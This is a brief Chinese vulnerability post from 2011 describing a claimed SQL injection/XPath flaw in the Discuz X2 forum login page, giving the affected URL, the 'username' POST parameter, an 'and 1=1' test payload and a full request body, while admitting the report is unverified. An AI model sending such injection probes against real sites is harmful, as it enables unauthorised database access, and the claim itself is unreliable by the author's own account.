Discuz X2 SQL注入/Xpath 最新漏洞

2011-08-18

老系统内容 Discuz SQL 漏洞注入

约 294 字预计阅读 1 分钟

文章目录

漏洞类型：SQL注入/Xpath

请求方式：POST

影响页面：http://127.0.0.1/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes

提交参数：username

参数测试：and 1=1

攻击细节：username=1+and+1=1&cookietime=2592000&password=1&quickforward=yes&handlekey=ls&fastloginfield

漏洞来源：网络，真实性未测……

文章作者 Nuclear'Atk

上次更新 2011-08-18